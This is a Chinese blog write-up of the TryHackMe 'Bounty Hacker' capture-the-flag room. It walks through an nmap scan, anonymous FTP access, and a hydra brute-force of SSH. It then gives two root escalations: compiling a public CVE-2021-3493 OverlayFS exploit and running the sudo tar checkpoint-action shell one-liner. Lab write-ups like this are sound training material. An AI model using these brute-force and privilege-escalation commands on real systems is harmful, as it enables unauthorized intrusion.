[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

前言

房间地址：https://tryhackme.com/room/cowboyhacker

你在酒吧里不断地吹嘘你的精英黑客技能，一些赏金猎人决定接受你的索赔！证明您的地位不仅仅是在酒吧喝几杯。我感觉到你的未来是青椒和牛肉！

图片[1],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

图片[2],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

实战

靶机地址：10.10.178.87

kali启动

图片[3],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

扫描

nmap -A -sC 10.10.178.87

扫描结果如下

图片[4],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

查看提示：

图片[5],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

访问网站看看他们给了什么

图片[6],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

查一下翻译快一点 ,虽然域大致能看懂

图片[7],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

看出来这些用户名都不像是要攻击的对象所以我们需要以匿名登录FTP

ftp 10.10.178.87
#用户名 anonymous

图片[8],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

有两个文件

我们拿下来看看

图片[9],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

如果有passive拦截就先退出输入passive关闭安全拦截

图片[10],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

好的都拿下了

图片[11],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

上面的那个是lock.txt 看出来好像是个密码

我们打开task.txt看一下

图片[12],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

图片[13],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

可以看到我们的ssh用户应该是lin

所以我们需要用九头蛇去爆破他

hydra -t 50 -l lin -P locks.txt -vV 10.10.178.87 ssh

出来了

图片[14],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

ssh lin@10.10.178.87

图片[15],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

让我们先拿一个user.txt flag再说

图片[16],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

下面还是提权

先看一下内核信息

cat /proc/version
#或者 uname -a

图片[17],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

系统是乌班图版本是16.04.12

sudo-l 看一下

提权

以下两种提权方法

第一种CVE-2021-3493提权

图片[20],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

根据我们之前看到的版本是16.04.12

可以知道CVE漏洞利用：CVE-2021-3493

https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/

图片[21],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

漏洞给了我们信息也给了我们演示

图片[22],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

看一下CVE漏洞提权演示

图片[23],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

GitHub – briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc

可以去github下载文件

图片[24],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

我把这个名字改了一下传到kali目录里

让后在本机传进去SSH

这里我犯了一个致命的问题(之前一直依赖工具传木马在工具上传文件 ) ,所以这次在ssh里传文件的时候我命令被禁止了, 我百思不得其解,甚至去找群主我为什么错了

图片[25],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

图片[26],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

不得不说我这此犯的错误有一点蠢哈哈

感谢群主指导, 啊啊啊,有那么一瞬间我觉得我是小可爱

我们scp传的时候是在本机kali上传而不是在ssh上传

scp /tmp/CVE2021.c lin@10.10.178.87:/tmp

图片[27],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

好的传上去了让我们去编译运行他吧！

图片[28],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

gcc CVE2021.c -o CVE #编译CVE2021.c 并-o 保存名字为CVE的文件
.CVE #运行我们的内核文件

图片[29],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

好的拿flag

图片[30],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

OK了

图片[31],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

第二种官方题解提权

之前我们sudo -l查询一下我们的权限

图片[32],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

可以看见我们可以以root身份去运行/bin/tar

那么这一定是个RCE执行漏洞

我们去这个地址https://gtfobins.github.io/#

搜索一下二进制内核漏洞

图片[33],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

让我们搜索一下tar

图片[34],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

进去tar 复制命令

图片[35],[Thm红队]Bounty Hacker赏金黑客之CVE-2021-3493漏洞提权(经常出现）,网络安全爱好者中心-神域博客网

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

一个命令我们就是root了再次感谢群主指导

借鉴了群主的WPhttps://blog.csdn.net/qq_54704239/article/details/128405540

------本文已结束，感谢您的阅读------

THE END

CTF CTF比赛题解 Thm靶场网络安全网络攻防